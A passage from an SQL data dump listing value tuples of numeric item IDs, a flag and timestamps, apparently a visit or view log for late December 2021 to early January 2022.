05:27:52'),(41064,3226,1,'2021-12-27','2021-12-27 05:31:05'),(41065,3226,1,'2021-12-27','2021-12-27 05:34:10'),(41066,2965,1,'2021-12-27','2021-12-27 07:09:23'),(41067,4529,1,'2021-12-27','2021-12-27 07:54:56'),(41068,1594,1,'2021-12-27','2021-12-27 08:00:40'),(41069,1588,1,'2021-12-27','2021-12-27 08:36:33'),(41070,485,1,'2021-12-27','2021-12-27 08:38:21'),(41071,76,1,'2021-12-27','2021-12-27 08:40:16'),(41072,4514,1,'2021-12-27','2021-12-27 10:20:12'),(41073,1602,1,'2021-12-27','2021-12-27 10:41:10'),(41074,1594,1,'2021-12-27','2021-12-27 11:06:59'),(41075,1600,1,'2021-12-27','2021-12-27 11:31:13'),(41076,3764,1,'2021-12-27','2021-12-27 11:36:55'),(41077,4524,1,'2021-12-27','2021-12-27 11:36:57'),(41078,4529,1,'2021-12-27','2021-12-27 11:37:03'),(41079,4457,1,'2021-12-27','2021-12-27 12:43:43'),(41080,472,1,'2021-12-27','2021-12-27 13:14:47'),(41081,1594,1,'2021-12-27','2021-12-27 14:23:41'),(41082,3109,1,'2021-12-27','2021-12-27 14:25:36'),(41083,80,1,'2021-12-27','2021-12-27 14:45:57'),(41084,1602,1,'2021-12-27','2021-12-27 15:56:09'),(41085,1602,1,'2021-12-27','2021-12-27 15:56:37'),(41086,1588,1,'2021-12-27','2021-12-27 16:16:23'),(41087,2609,1,'2021-12-27','2021-12-27 16:23:14'),(41088,2609,1,'2021-12-27','2021-12-27 16:23:21'),(41089,2609,1,'2021-12-27','2021-12-27 16:23:31'),(41090,474,1,'2021-12-27','2021-12-27 16:23:48'),(41091,3482,1,'2021-12-27','2021-12-27 16:32:24'),(41092,2293,1,'2021-12-27','2021-12-27 17:20:38'),(41093,1737,1,'2021-12-27','2021-12-27 17:59:42'),(41094,1782,1,'2021-12-27','2021-12-27 18:59:43'),(41095,1582,1,'2021-12-27','2021-12-27 20:00:31'),(41096,1768,1,'2021-12-27','2021-12-27 20:25:48'),(41097,1600,1,'2021-12-27','2021-12-27 20:42:54'),(41098,1600,1,'2021-12-27','2021-12-27 20:43:27'),(41099,4529,1,'2021-12-27','2021-12-27 21:08:34'),(41100,4412,1,'2021-12-27','2021-12-27 21:37:24'),(41101,3090,1,'2021-12-27','2021-12-27 21:47:57'),(41102,2769,1,'2021-12-27','2021-12-27 22:11:04'),(41103,1600,1,'2021-12-28','2021-12-28 00:33:05'),(41104,3482,1,'2021-12-28','2021-12-28 03:41:43'),(41105,72,1,'2021-12-28','2021-12-28 05:26:00'),(41106,4457,1,'2021-12-28','2021-12-28 05:39:10'),(41107,1594,1,'2021-12-28','2021-12-28 05:52:57'),(41108,2309,1,'2021-12-28','2021-12-28 06:06:35'),(41109,1612,1,'2021-12-28','2021-12-28 06:36:11'),(41110,1600,1,'2021-12-28','2021-12-28 06:40:40'),(41111,3243,1,'2021-12-28','2021-12-28 06:52:55'),(41112,1872,1,'2021-12-28','2021-12-28 07:25:46'),(41113,1586,1,'2021-12-28','2021-12-28 07:49:12'),(41114,4529,1,'2021-12-28','2021-12-28 07:52:51'),(41115,2813,1,'2021-12-28','2021-12-28 08:11:54'),(41116,2457,1,'2021-12-28','2021-12-28 08:32:11'),(41117,1598,1,'2021-12-28','2021-12-28 08:47:21'),(41118,1602,1,'2021-12-28','2021-12-28 09:19:21'),(41119,87,1,'2021-12-28','2021-12-28 09:19:56'),(41120,87,1,'2021-12-28','2021-12-28 09:20:39'),(41121,1602,1,'2021-12-28','2021-12-28 09:21:14'),(41122,482,1,'2021-12-28','2021-12-28 09:30:22'),(41123,1774,1,'2021-12-28','2021-12-28 09:31:03'),(41124,1776,1,'2021-12-28','2021-12-28 09:45:34'),(41125,474,1,'2021-12-28','2021-12-28 09:51:25'),(41126,4448,1,'2021-12-28','2021-12-28 10:30:32'),(41127,3087,1,'2021-12-28','2021-12-28 11:39:36'),(41128,3087,1,'2021-12-28','2021-12-28 11:48:30'),(41129,72,1,'2021-12-28','2021-12-28 12:47:57'),(41130,76,1,'2021-12-28','2021-12-28 12:50:58'),(41131,89,1,'2021-12-28','2021-12-28 12:57:42'),(41132,1612,1,'2021-12-28','2021-12-28 13:45:36'),(41133,3282,1,'2021-12-28','2021-12-28 13:55:39'),(41134,1594,1,'2021-12-28','2021-12-28 14:46:43'),(41135,1598,1,'2021-12-28','2021-12-28 15:31:35'),(41136,2159,1,'2021-12-28','2021-12-28 15:49:42'),(41137,3664,1,'2021-12-28','2021-12-28 17:26:48'),(41138,1594,1,'2021-12-28','2021-12-28 17:37:42'),(41139,3482,1,'2021-12-28','2021-12-28 17:43:30'),(41140,1737,1,'2021-12-28','2021-12-28 18:20:55'),(41141,2813,1,'2021-12-28','2021-12-28 18:26:02'),(41142,2804,1,'2021-12-28','2021-12-28 19:10:47'),(41143,570,1,'2021-12-28','2021-12-28 20:01:16'),(41144,570,1,'2021-12-28','2021-12-28 20:02:17'),(41145,1768,1,'2021-12-28','2021-12-28 20:06:51'),(41146,1602,1,'2021-12-28','2021-12-28 20:07:33'),(41147,3045,1,'2021-12-28','2021-12-28 20:25:03'),(41148,80,1,'2021-12-28','2021-12-28 20:35:16'),(41149,1586,1,'2021-12-28','2021-12-28 20:45:01'),(41150,2704,1,'2021-12-28','2021-12-28 23:29:35'),(41151,1594,1,'2021-12-28','2021-12-28 23:46:41'),(41152,1718,1,'2021-12-29','2021-12-29 00:26:10'),(41153,1718,1,'2021-12-29','2021-12-29 00:28:57'),(41154,1718,1,'2021-12-29','2021-12-29 00:29:26'),(41155,76,1,'2021-12-29','2021-12-29 00:31:54'),(41156,91,1,'2021-12-29','2021-12-29 00:33:29'),(41157,4368,1,'2021-12-29','2021-12-29 00:34:36'),(41158,4368,1,'2021-12-29','2021-12-29 00:34:38'),(41159,1598,1,'2021-12-29','2021-12-29 01:01:50'),(41160,1602,1,'2021-12-29','2021-12-29 01:46:47'),(41161,2813,1,'2021-12-29','2021-12-29 02:46:41'),(41162,2748,1,'2021-12-29','2021-12-29 03:02:13'),(41163,3030,1,'2021-12-29','2021-12-29 03:30:56'),(41164,1697,1,'2021-12-29','2021-12-29 03:33:42'),(41165,2956,1,'2021-12-29','2021-12-29 03:46:39'),(41166,3482,1,'2021-12-29','2021-12-29 03:46:41'),(41167,3066,1,'2021-12-29','2021-12-29 04:23:11'),(41168,1614,1,'2021-12-29','2021-12-29 04:37:21'),(41169,487,1,'2021-12-29','2021-12-29 05:18:13'),(41170,467,1,'2021-12-29','2021-12-29 05:49:58'),(41171,72,1,'2021-12-29','2021-12-29 05:59:48'),(41172,3706,1,'2021-12-29','2021-12-29 06:36:01'),(41173,3096,1,'2021-12-29','2021-12-29 06:44:55'),(41174,2293,1,'2021-12-29','2021-12-29 06:46:40'),(41175,3058,1,'2021-12-29','2021-12-29 07:13:20'),(41176,1594,1,'2021-12-29','2021-12-29 08:03:40'),(41177,3058,1,'2021-12-29','2021-12-29 08:29:02'),(41178,4341,1,'2021-12-29','2021-12-29 08:29:37'),(41179,2775,1,'2021-12-29','2021-12-29 08:36:37'),(41180,1602,1,'2021-12-29','2021-12-29 09:18:26'),(41181,1614,1,'2021-12-29','2021-12-29 09:23:23'),(41182,1598,1,'2021-12-29','2021-12-29 09:30:56'),(41183,4529,1,'2021-12-29','2021-12-29 09:43:25'),(41184,3243,1,'2021-12-29','2021-12-29 09:56:32'),(41185,1582,1,'2021-12-29','2021-12-29 10:20:59'),(41186,2813,1,'2021-12-29','2021-12-29 10:33:29'),(41187,2813,1,'2021-12-29','2021-12-29 10:46:00'),(41188,1588,1,'2021-12-29','2021-12-29 10:47:05'),(41189,2989,1,'2021-12-29','2021-12-29 10:58:34'),(41190,2989,1,'2021-12-29','2021-12-29 10:59:24'),(41191,3102,1,'2021-12-29','2021-12-29 11:04:51'),(41192,2704,1,'2021-12-29','2021-12-29 11:09:07'),(41193,1594,1,'2021-12-29','2021-12-29 11:11:43'),(41194,2309,1,'2021-12-29','2021-12-29 11:23:40'),(41195,1594,1,'2021-12-29','2021-12-29 11:36:13'),(41196,3781,1,'2021-12-29','2021-12-29 12:01:15'),(41197,2457,1,'2021-12-29','2021-12-29 12:13:41'),(41198,1614,1,'2021-12-29','2021-12-29 12:37:46'),(41199,2159,1,'2021-12-29','2021-12-29 12:46:18'),(41200,2159,1,'2021-12-29','2021-12-29 12:47:27'),(41201,2159,1,'2021-12-29','2021-12-29 12:47:38'),(41202,2159,1,'2021-12-29','2021-12-29 12:48:03'),(41203,3742,1,'2021-12-29','2021-12-29 14:37:08'),(41204,467,1,'2021-12-29','2021-12-29 14:50:41'),(41205,87,1,'2021-12-29','2021-12-29 15:29:09'),(41206,487,1,'2021-12-29','2021-12-29 15:29:33'),(41207,1586,1,'2021-12-29','2021-12-29 17:04:37'),(41208,1602,1,'2021-12-29','2021-12-29 18:20:50'),(41209,2609,1,'2021-12-29','2021-12-29 19:10:27'),(41210,1697,1,'2021-12-29','2021-12-29 19:38:08'),(41211,3486,1,'2021-12-29','2021-12-29 19:42:24'),(41212,4529,1,'2021-12-29','2021-12-29 20:40:19'),(41213,2956,1,'2021-12-29','2021-12-29 20:40:29'),(41214,2309,1,'2021-12-29','2021-12-29 21:10:19'),(41215,2989,1,'2021-12-29','2021-12-29 21:40:41'),(41216,3781,1,'2021-12-29','2021-12-29 22:12:02'),(41217,3097,1,'2021-12-29','2021-12-29 23:19:10'),(41218,4520,1,'2021-12-30','2021-12-30 00:07:28'),(41219,4520,1,'2021-12-30','2021-12-30 00:07:32'),(41220,4520,1,'2021-12-30','2021-12-30 00:10:21'),(41221,1614,1,'2021-12-30','2021-12-30 00:55:24'),(41222,2156,1,'2021-12-30','2021-12-30 01:08:58'),(41223,2989,1,'2021-12-30','2021-12-30 02:27:15'),(41224,3316,1,'2021-12-30','2021-12-30 03:33:39'),(41225,80,1,'2021-12-30','2021-12-30 07:06:33'),(41226,1594,1,'2021-12-30','2021-12-30 07:17:33'),(41227,4457,1,'2021-12-30','2021-12-30 08:21:16'),(41228,72,1,'2021-12-30','2021-12-30 10:08:31'),(41229,91,1,'2021-12-30','2021-12-30 10:57:19'),(41230,1608,1,'2021-12-30','2021-12-30 11:09:18'),(41231,1778,1,'2021-12-30','2021-12-30 11:14:29'),(41232,2411,1,'2021-12-30','2021-12-30 11:20:58'),(41233,3438,1,'2021-12-30','2021-12-30 11:27:23'),(41234,1703,1,'2021-12-30','2021-12-30 11:47:59'),(41235,482,1,'2021-12-30','2021-12-30 11:53:10'),(41236,1695,1,'2021-12-30','2021-12-30 11:53:12'),(41237,4238,1,'2021-12-30','2021-12-30 11:53:19'),(41238,2813,1,'2021-12-30','2021-12-30 12:12:39'),(41239,2989,1,'2021-12-30','2021-12-30 12:25:25'),(41240,1870,1,'2021-12-30','2021-12-30 12:38:33'),(41241,1608,1,'2021-12-30','2021-12-30 12:39:06'),(41242,4301,1,'2021-12-30','2021-12-30 12:40:01'),(41243,472,1,'2021-12-30','2021-12-30 12:41:23'),(41244,3087,1,'2021-12-30','2021-12-30 12:47:47'),(41245,3087,1,'2021-12-30','2021-12-30 12:47:52'),(41246,3781,1,'2021-12-30','2021-12-30 12:48:26'),(41247,2309,1,'2021-12-30','2021-12-30 12:53:37'),(41248,2609,1,'2021-12-30','2021-12-30 12:57:32'),(41249,1610,1,'2021-12-30','2021-12-30 13:21:11'),(41250,1610,1,'2021-12-30','2021-12-30 13:21:14'),(41251,1766,1,'2021-12-30','2021-12-30 13:23:11'),(41252,1594,1,'2021-12-30','2021-12-30 13:37:05'),(41253,1594,1,'2021-12-30','2021-12-30 13:37:08'),(41254,3752,1,'2021-12-30','2021-12-30 13:55:30'),(41255,4524,1,'2021-12-30','2021-12-30 13:56:18'),(41256,570,1,'2021-12-30','2021-12-30 15:09:35'),(41257,570,1,'2021-12-30','2021-12-30 15:10:20'),(41258,570,1,'2021-12-30','2021-12-30 15:11:24'),(41259,570,1,'2021-12-30','2021-12-30 15:26:14'),(41260,1594,1,'2021-12-30','2021-12-30 15:37:37'),(41261,2309,1,'2021-12-30','2021-12-30 17:29:46'),(41262,1608,1,'2021-12-30','2021-12-30 19:54:20'),(41263,2704,1,'2021-12-30','2021-12-30 19:55:51'),(41264,3282,1,'2021-12-30','2021-12-30 21:23:59'),(41265,4238,1,'2021-12-30','2021-12-30 21:48:58'),(41266,1870,1,'2021-12-30','2021-12-30 22:34:38'),(41267,1695,1,'2021-12-30','2021-12-30 23:09:46'),(41268,4391,1,'2021-12-30','2021-12-30 23:20:05'),(41269,4391,1,'2021-12-30','2021-12-30 23:21:06'),(41270,2309,1,'2021-12-31','2021-12-31 01:35:58'),(41271,1734,1,'2021-12-31','2021-12-31 02:15:28'),(41272,3282,1,'2021-12-31','2021-12-31 04:00:37'),(41273,4457,1,'2021-12-31','2021-12-31 04:06:35'),(41274,472,1,'2021-12-31','2021-12-31 04:36:15'),(41275,472,1,'2021-12-31','2021-12-31 04:38:37'),(41276,1776,1,'2021-12-31','2021-12-31 05:36:09'),(41277,1606,1,'2021-12-31','2021-12-31 06:35:32'),(41278,1594,1,'2021-12-31','2021-12-31 06:49:16'),(41279,1608,1,'2021-12-31','2021-12-31 07:29:21'),(41280,1604,1,'2021-12-31','2021-12-31 07:40:36'),(41281,1604,1,'2021-12-31','2021-12-31 08:20:57'),(41282,4335,1,'2021-12-31','2021-12-31 09:28:28'),(41283,3675,1,'2021-12-31','2021-12-31 09:47:47'),(41284,3127,1,'2021-12-31','2021-12-31 09:52:40'),(41285,72,1,'2021-12-31','2021-12-31 10:41:02'),(41286,3486,1,'2021-12-31','2021-12-31 10:55:10'),(41287,4396,1,'2021-12-31','2021-12-31 11:14:21'),(41288,3104,1,'2021-12-31','2021-12-31 11:21:19'),(41289,4396,1,'2021-12-31','2021-12-31 11:30:36'),(41290,2309,1,'2021-12-31','2021-12-31 11:43:28'),(41291,3104,1,'2021-12-31','2021-12-31 12:10:14'),(41292,80,1,'2021-12-31','2021-12-31 12:13:13'),(41293,68,1,'2021-12-31','2021-12-31 12:13:17'),(41294,108,1,'2021-12-31','2021-12-31 12:13:21'),(41295,2410,1,'2021-12-31','2021-12-31 12:24:16'),(41296,1598,1,'2021-12-31','2021-12-31 12:35:04'),(41297,2813,1,'2021-12-31','2021-12-31 12:47:50'),(41298,1724,1,'2021-12-31','2021-12-31 12:52:59'),(41299,1602,1,'2021-12-31','2021-12-31 13:07:30'),(41300,2457,1,'2021-12-31','2021-12-31 14:18:44'),(41301,1586,1,'2021-12-31','2021-12-31 14:50:00'),(41302,472,1,'2021-12-31','2021-12-31 16:17:52'),(41303,1614,1,'2021-12-31','2021-12-31 16:38:44'),(41304,3181,1,'2021-12-31','2021-12-31 17:22:27'),(41305,2813,1,'2021-12-31','2021-12-31 17:23:37'),(41306,3181,1,'2021-12-31','2021-12-31 17:48:12'),(41307,1602,1,'2021-12-31','2021-12-31 18:17:46'),(41308,4323,1,'2021-12-31','2021-12-31 19:22:52'),(41309,3705,1,'2021-12-31','2021-12-31 20:17:52'),(41310,80,1,'2022-01-01','2022-01-01 00:45:13'),(41311,2813,1,'2022-01-01','2022-01-01 02:30:32'),(41312,2813,1,'2022-01-01','2022-01-01 02:49:21'),(41313,1596,1,'2022-01-01','2022-01-01 04:55:35'),(41314,84,1,'2022-01-01','2022-01-01 05:13:41'),(41315,3034,1,'2022-01-01','2022-01-01 05:41:07'),(41316,3107,1,'2022-01-01','2022-01-01 05:53:22'),(41317,3034,1,'2022-01-01','2022-01-01 06:04:27'),(41318,469,1,'2022-01-01','2022-01-01 07:13:37'),(41319,1600,1,'2022-01-01','2022-01-01 09:21:42'),(41320,4457,1,'2022-01-01','2022-01-01 09:55:12'),(41321,91,1,'2022-01-01','2022-01-01 09:56:27'),(41322,4377,1,'2022-01-01','2022-01-01 09:57:27'),(41323,4377,1,'2022-01-01','2022-01-01 09:57:28'),(41324,3051,1,'2022-01-01','2022-01-01 10:42:08'),(41325,1606,1,'2022-01-01','2022-01-01 10:49:07'),(41326,1544,1,'2022-01-01','2022-01-01 11:27:07'),(41327,3087,1,'2022-01-01','2022-01-01 11:27:16'),(41328,2309,1,'2022-01-01','2022-01-01 12:15:08'),(41329,469,1,'2022-01-01','2022-01-01 12:27:59'),(41330,2813,1,'2022-01-01','2022-01-01 12:32:22'),(41331,1600,1,'2022-01-01','2022-01-01 12:32:39'),(41332,2813,1,'2022-01-01','2022-01-01 12:36:36'),(41333,2813,1,'2022-01-01','2022-01-01 12:37:22'),(41334,2813,1,'2022-01-01','2022-01-01 12:52:31'),(41335,467,1,'2022-01-01','2022-01-01 12:52:37'),(41336,91,1,'2022-01-01','2022-01-01 13:06:25'),(41337,2813,1,'2022-01-01','2022-01-01 13:08:50'),(41338,1592,1,'2022-01-01','2022-01-01 13:18:21'),(41339,1705,1,'2022-01-01','2022-01-01 13:57:47'),(41340,1614,1,'2022-01-01','2022-01-01 14:19:29'),(41341,1614,1,'2022-01-01','2022-01-01 14:22:39'),(41342,1612,1,'2022-01-01','2022-01-01 14:38:29'),(41343,1612,1,'2022-01-01','2022-01-01 14:40:03'),(41344,3313,1,'2022-01-01','2022-01-01 18:57:26'),(41345,1594,1,'2022-01-01','2022-01-01 19:11:20'),(41346,80,1,'2022-01-01','2022-01-01 20:25:02'),(41347,2813,1,'2022-01-01','2022-01-01 20:37:33'),(41348,3245,1,'2022-01-01','2022-01-01 20:39:37'),(41349,2813,1,'2022-01-01','2022-01-01 20:48:46'),(41350,3313,1,'2022-01-01','2022-01-01 21:47:29'),(41351,469,1,'2022-01-01','2022-01-01 22:03:30'),(41352,1705,1,'2022-01-02','2022-01-02 00:54:38'),(41353,3107,1,'2022-01-02','2022-01-02 01:21:28'),(41354,2297,1,'2022-01-02','2022-01-02 02:11:12'),(41355,80,1,'2022-01-02','2022-01-02 03:02:55'),(41356,68,1,'2022-01-02','2022-01-02 03:02:58'),(41357,108,1,'2022-01-02','2022-01-02 03:03:02'),(41358,2964,1,'2022-01-02','2022-01-02 03:43:13'),(41359,1705,1,'2022-01-02','2022-01-02 04:36:42'),(41360,1598,1,'2022-01-02','2022-01-02 04:51:15'),(41361,1780,1,'2022-01-02','2022-01-02 05:48:13'),(41362,469,1,'2022-01-02','2022-01-02 06:58:46'),(41363,72,1,'2022-01-02','2022-01-02 09:21:23'),(41364,3006,1,'2022-01-02','2022-01-02 11:31:13'),(41365,2904,1,'2022-01-02','2022-01-02 11:50:04'),(41366,1780,1,'2022-01-02','2022-01-02 11:55:56'),(41367,2309,1,'2022-01-02','2022-01-02 13:47:37'),(41368,3771,1,'2022-01-02','2022-01-02 14:38:50'),(41369,3430,1,'2022-01-02','2022-01-02 15:38:46'),(41370,3771,1,'2022-01-02','2022-01-02 15:44:38'),(41371,469,1,'2022-01-02','2022-01-02 16:09:56'),(41372,2704,1,'2022-01-02','2022-01-02 18:01:05'),(41373,2704,1,'2022-01-02','2022-01-02 18:29:56'),(41374,1600,1,'2022-01-02','2022-01-02 18:38:34'),(41375,1600,1,'2022-01-02','2022-01-02 18:39:18'),(41376,2617,1,'2022-01-02','2022-01-02 23:54:22'),(41377,1592,1,'2022-01-03','2022-01-03 00:23:32'),(41378,1606,1,'2022-01-03','2022-01-03 00:58:46'),(41379,4457,1,'2022-01-03','2022-01-03 01:24:06'),(41380,2904,1,'2022-01-03','2022-01-03 05:44:17'),(41381,2904,1,'2022-01-03','2022-01-03 05:46:49'),(41382,2769,1,'2022-01-03','2022-01-03 06:23:22'),(41383,1606,1,'2022-01-03','2022-01-03 06:50:53'),(41384,1606,1,'2022-01-03','2022-01-03 06:52:01'),(41385,2911,1,'2022-01-03','2022-01-03 06:58:24'),(41386,2159,1,'2022-01-03','2022-01-03 07:14:12'),(41387,2159,1,'2022-01-03','2022-01-03 07:15:42'),(41388,1586,1,'2022-01-03','2022-01-03 07:28:05'),(41389,2769,1,'2022-01-03','2022-01-03 07:42:30'),(41390,4457,1,'2022-01-03','2022-01-03 07:54:08'),(41391,1582,1,'2022-01-03','2022-01-03 07:57:22'),(41392,1582,1,'2022-01-03','2022-01-03 08:23:59'),(41393,2309,1,'2022-01-03','2022-01-03 10:01:04'),(41394,1730,1,'2022-01-03','2022-01-03 11:41:56'),(41395,1592,1,'2022-01-03','2022-01-03 12:26:24'),(41396,1720,1,'2022-01-03','2022-01-03 12:52:22'),(41397,1720,1,'2022-01-03','2022-01-03 12:52:49'),(41398,1720,1,'2022-01-03','2022-01-03 12:53:04'),(41399,1614,1,'2022-01-03','2022-01-03 13:05:43'),(41400,1870,1,'2022-01-03','2022-01-03 13:29:05'),(41401,482,1,'2022-01-03','2022-01-03 13:29:37'),(41402,2904,1,'2022-01-03','2022-01-03 14:09:30'),(41403,2904,1,'2022-01-03','2022-01-03 14:09:38'),(41404,1600,1,'2022-01-03','2022-01-03 14:29:07'),(41405,87,1,'2022-01-03','2022-01-03 14:29:40'),(41406,76,1,'2022-01-03','2022-01-03 14:30:02'),(41407,68,1,'2022-01-03','2022-01-03 14:30:16'),(41408,72,1,'2022-01-03','2022-01-03 15:18:39'),(41409,3087,1,'2022-01-03','2022-01-03 15:23:24'),(41410,1594,1,'2022-01-03','2022-01-03 16:10:49'),(41411,1594,1,'2022-01-03','2022-01-03 16:10:55'),(41412,1602,1,'2022-01-03','2022-01-03 16:12:13'),(41413,1772,1,'2022-01-03','2022-01-03 16:19:23'),(41414,1612,1,'2022-01-03','2022-01-03 16:21:03'),(41415,1602,1,'2022-01-03','2022-01-03 16:22:51'),(41416,1612,1,'2022-01-03','2022-01-03 16:34:54'),(41417,89,1,'2022-01-03','2022-01-03 16:35:55'),(41418,1586,1,'2022-01-03','2022-01-03 16:36:29'),(41419,1594,1,'2022-01-03','2022-01-03 16:38:00'),(41420,89,1,'2022-01-03','2022-01-03 16:38:48'),(41421,1586,1,'2022-01-03','2022-01-03 16:40:16'),(41422,1594,1,'2022-01-03','2022-01-03 17:27:34'),(41423,4514,1,'2022-01-03','2022-01-03 17:42:41'),(41424,2309,1,'2022-01-03','2022-01-03 18:26:21'),(41425,2309,1,'2022-01-03','2022-01-03 18:42:26'),(41426,1588,1,'2022-01-03','2022-01-03 21:43:18'),(41427,1586,1,'2022-01-04','2022-01-04 01:45:04'),(41428,1586,1,'2022-01-04','2022-01-04 01:51:57'),(41429,469,1,'2022-01-04','2022-01-04 03:21:42'),(41430,1594,1,'2022-01-04','2022-01-04 04:56:50'),(41431,1594,1,'2022-01-04','2022-01-04 04:56:59'),(41432,2809,1,'2022-01-04','2022-01-04 05:41:23'),(41433,1586,1,'2022-01-04','2022-01-04 06:23:22'),(41434,2769,1,'2022-01-04','2022-01-04 06:37:15'),(41435,1594,1,'2022-01-04','2022-01-04 06:52:50'),(41436,2248,1,'2022-01-04','2022-01-04 06:57:21'),(41437,72,1,'2022-01-04','2022-01-04 06:59:46'),(41438,2989,1,'2022-01-04','2022-01-04 07:32:44'),(41439,2989,1,'2022-01-04','2022-01-04 07:33:59'),(41440,91,1,'2022-01-04','2022-01-04 07:41:29'),(41441,2989,1,'2022-01-04','2022-01-04 07:42:41'),(41442,91,1,'2022-01-04','2022-01-04 07:43:32'),(41443,2989,1,'2022-01-04','2022-01-04 07:43:59'),(41444,2989,1,'2022-01-04','2022-01-04 07:44:03'),(41445,2989,1,'2022-01-04','2022-01-04 07:44:18'),(41446,4432,1,'2022-01-04','2022-01-04 07:44:36'),(41447,4432,1,'2022-01-04','2022-01-04 07:44:37'),(41448,2989,1,'2022-01-04','2022-01-04 07:46:23'),(41449,91,1,'2022-01-04','2022-01-04 07:48:00'),(41450,2989,1,'2022-01-04','2022-01-04 07:49:03'),(41451,2989,1,'2022-01-04','2022-01-04 07:49:12'),(41452,91,1,'2022-01-04','2022-01-04 07:49:15'),(41453,4396,1,'2022-01-04','2022-01-04 07:49:45'),(41454,91,1,'2022-01-04','2022-01-04 07:51:01'),(41455,2989,1,'2022-01-04','2022-01-04 07:51:52'),(41456,2989,1,'2022-01-04','2022-01-04 07:51:58'),(41457,2989,1,'2022-01-04','2022-01-04 07:54:23'),(41458,91,1,'2022-01-04','2022-01-04 07:54:33'),(41459,4536,1,'2022-01-04','2022-01-04 07:54:52'),(41460,4536,1,'2022-01-04','2022-01-04 07:55:42'),(41461,2989,1,'2022-01-04','2022-01-04 07:58:06'),(41462,91,1,'2022-01-04','2022-01-04 07:58:38'),(41463,570,1,'2022-01-04','2022-01-04 08:00:15'),(41464,91,1,'2022-01-04','2022-01-04 08:00:34'),(41465,4323,1,'2022-01-04','2022-01-04 08:06:40'),(41466,4529,1,'2022-01-04','2022-01-04 08:54:53'),(41467,1612,1,'2022-01-04','2022-01-04 09:29:44'),(41468,91,1,'2022-01-04','2022-01-04 09:31:12'),(41469,4542,1,'2022-01-04','2022-01-04 09:31:47'),(41470,1594,1,'2022-01-04','2022-01-04 10:25:05'),(41471,2904,1,'2022-01-04','2022-01-04 10:27:10'),(41472,2904,1,'2022-01-04','2022-01-04 10:27:20'),(41473,1594,1,'2022-01-04','2022-01-04 10:28:36'),(41474,4457,1,'2022-01-04','2022-01-04 11:04:39'),(41475,2989,1,'2022-01-04','2022-01-04 11:26:52'),(41476,1772,1,'2022-01-04','2022-01-04 15:03:11'),(41477,1772,1,'2022-01-04','2022-01-04 15:03:12'),(41478,1772,1,'2022-01-04','2022-01-04 15:03:28'),(41479,1772,1,'2022-01-04','2022-01-04 15:03:41'),(41480,1772,1,'2022-01-04','2022-01-04 15:04:11'),(41481,76,1,'2022-01-04','2022-01-04 15:04:19'),(41482,91,1,'2022-01-04','2022-01-04 15:04:34'),(41483,4432,1,'2022-01-04','2022-01-04 15:05:06'),(41484,1870,1,'2022-01-04','2022-01-04 17:31:47'),(41485,1602,1,'2022-01-04','2022-01-04 18:14:58'),(41486,3127,1,'2022-01-04','2022-01-04 18:29:14'),(41487,4323,1,'2022-01-04','2022-01-04 20:07:29'),(41488,2248,1,'2022-01-04','2022-01-04 20:35:26'),(41489,1588,1,'2022-01-04','2022-01-04 20:36:16'),(41490,2904,1,'2022-01-04','2022-01-04 20:39:52'),(41491,91,1,'2022-01-04','2022-01-04 20:40:01'),(41492,68,1,'2022-01-04','2022-01-04 20:41:24'),(41493,108,1,'2022-01-04','2022-01-04 20:41:37'),(41494,1588,1,'2022-01-04','2022-01-04 20:42:40'),(41495,74,1,'2022-01-04','2022-01-04 20:44:37'),(41496,2503,1,'2022-01-04','2022-01-04 20:44:40'),(41497,4492,1,'2022-01-04','2022-01-04 20:45:28'),(41498,72,1,'2022-01-04','2022-01-04 20:45:33'),(41499,76,1,'2022-01-04','2022-01-04 20:46:02'),(41500,80,1,'2022-01-04','2022-01-04 20:46:33'),(41501,4508,1,'2022-01-04','2022-01-04 20:46:42'),(41502,4348,1,'2022-01-04','2022-01-04 20:46:51'),(41503,89,1,'2022-01-04','2022-01-04 20:47:03'),(41504,68,1,'2022-01-04','2022-01-04 20:47:19'),(41505,72,1,'2022-01-04','2022-01-04 20:47:26'),(41506,4498,1,'2022-01-04','2022-01-04 20:47:41'),(41507,4496,1,'2022-01-04','2022-01-04 20:47:43'),(41508,72,1,'2022-01-04','2022-01-04 20:47:45'),(41509,4344,1,'2022-01-04','2022-01-04 20:47:46'),(41510,335,1,'2022-01-04','2022-01-04 20:47:58'),(41511,108,1,'2022-01-04','2022-01-04 20:48:10'),(41512,3245,1,'2022-01-04','2022-01-04 20:48:17'),(41513,3181,1,'2022-01-04','2022-01-04 20:48:50'),(41514,3178,1,'2022-01-04','2022-01-04 20:50:36'),(41515,3585,1,'2022-01-04','2022-01-04 20:50:47'),(41516,74,1,'2022-01-04','2022-01-04 20:51:13'),(41517,3058,1,'2022-01-04','2022-01-04 20:52:16'),(41518,3181,1,'2022-01-04','2022-01-04 20:54:18'),(41519,87,1,'2022-01-04','2022-01-04 21:04:17'),(41520,4348,1,'2022-01-04','2022-01-04 21:06:24'),(41521,4496,1,'2022-01-04','2022-01-04 21:07:08'),(41522,3178,1,'2022-01-04','2022-01-04 21:11:26'),(41523,2558,1,'2022-01-04','2022-01-04 21:20:36'),(41524,2558,1,'2022-01-05','2022-01-05 00:49:10'),(41525,1582,1,'2022-01-05','2022-01-05 02:45:39'),(41526,1870,1,'2022-01-05','2022-01-05 03:08:01'),(41527,2297,1,'2022-01-05','2022-01-05 04:42:58'),(41528,4457,1,'2022-01-05','2022-01-05 05:25:25'),(41529,1718,1,'2022-01-05','2022-01-05 07:52:17'),(41530,1720,1,'2022-01-05','2022-01-05 08:03:26'),(41531,3307,1,'2022-01-05','2022-01-05 08:25:28'),(41532,3307,1,'2022-01-05','2022-01-05 08:35:27'),(41533,80,1,'2022-01-05','2022-01-05 08:40:43'),(41534,1776,1,'2022-01-05','2022-01-05 08:53:14'),(41535,91,1,'2022-01-05','2022-01-05 08:53:43'),(41536,3531,1,'2022-01-05','2022-01-05 08:55:01'),(41537,1768,1,'2022-01-05','2022-01-05 09:08:17'),(41538,467,1,'2022-01-05','2022-01-05 09:08:28'),(41539,1586,1,'2022-01-05','2022-01-05 09:23:26'),(41540,2904,1,'2022-01-05','2022-01-05 09:24:30'),(41541,1724,1,'2022-01-05','2022-01-05 09:47:18'),(41542,1724,1,'2022-01-05','2022-01-05 09:49:42'),(41543,1718,1,'2022-01-05','2022-01-05 10:11:15'),(41544,1720,1,'2022-01-05','2022-01-05 10:16:55'),(41545,2148,1,'2022-01-05','2022-01-05 10:38:05'),(41546,2148,1,'2022-01-05','2022-01-05 10:38:25'),(41547,2148,1,'2022-01-05','2022-01-05 10:38:52'),(41548,2297,1,'2022-01-05','2022-01-05 10:44:41'),(41549,1608,1,'2022-01-05','2022-01-05 